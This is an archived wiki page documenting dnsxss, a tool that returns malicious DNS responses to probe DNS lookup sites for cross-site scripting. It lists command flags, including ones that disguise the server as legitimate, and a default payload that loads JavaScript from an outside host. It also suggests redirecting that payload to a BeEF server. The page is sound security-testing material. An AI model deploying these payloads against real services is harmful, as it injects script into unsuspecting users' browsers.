WARNING: Wiki content is an archive, no promise about quality!
Intro
dnsxss is designed to send back malicious responses to DNS queries in order to test DNS lookup servers for common classes of vulnerabilities. By default, dnsxss returns a string containing some Javascript code to all MX, CNAME, NS, and TEXT requests, in the hopes that the DNS lookup will be displayed in a browser.
When I originally wrote this, I tested it on a handful of Internet sites. Every one of them was vulnerable.
I haven't tried testing other vulnerabilities, like SQL injection or shell injection, but I suspect that this is a great attack vector for those and other vulnerabilities, because people don't realize that malicious traffic can be returned.
Usage
./dnsxss [-t <test string>]
-a <address>
The address sent back to the user when an A request is made. Can be used
to disguise this as a legitimate DNS server. Default: 127.0.0.1.
-aaaa <address>
The address sent back to the user when an AAAA (IPv6) request is made. Can
be used to disguise this as a legitimate DNS server. Default: ::1.
-d <domain>
The domain to put after the test string. It should be the same as the
one that points to your host.
-h
Help
--payload <data>
The string containing the HTML characters, that will ultimately test for
the cross-site scripting vulnerability. Ultimately, this can contain any
type of attack, such as sql-injection. One thing to note is that DNS
generally seems to filter certain characters; in my testing, anything with
an ASCII code of 0x20 (Space) or lower was replaced with an escaped
/xxx, and brackets had a backslash added before them.
Default:
<script src='http://www.skullsecurity.org/test-js.js'></script>
Note that unless a TEXT record is requested, spaces are replaced with
slashes ('/'), which work in Firefox but not IE.
--keep-spaces
By default, spaces in the payload are replaced with slashes ('/') because
the DNS protocol doesn't like spaces. Use this flag to bypass that
filter.
--test <domain>
Test to see if we are the authoritative nameserver for the given domain.
-u --username
The username to use when dropping privileges. Default: nobody.
-s --source <address>
The local address to bind to. Default: any (0.0.0.0)
-p --port <port>
The local port to listen on. I don't recommend changing this.
default: 53
Examples
Running this program without arguments returns a pretty typical cross-site scripting string:
$ dig @localhost -t TXT test
[...]
;; ANSWER SECTION:
test. 1 IN TXT "<script src='http://www.skullsecurity.org/test-js.js'></script>.test"
This will display a messagebox on the user's screen alerting them to the issue. You can change the payload using the --payload argument and point it at, for example, a BeEF server.
Authoritative DNS server
Many functions of this tool require you to be the authoritative nameserver for a domain. This typically costs money, but is fairly cheap and has a lot of benefits. If you aren't sure whether or not you're the authority, you can use the --test argument to this program, or you can directly run the dnstest program, also included.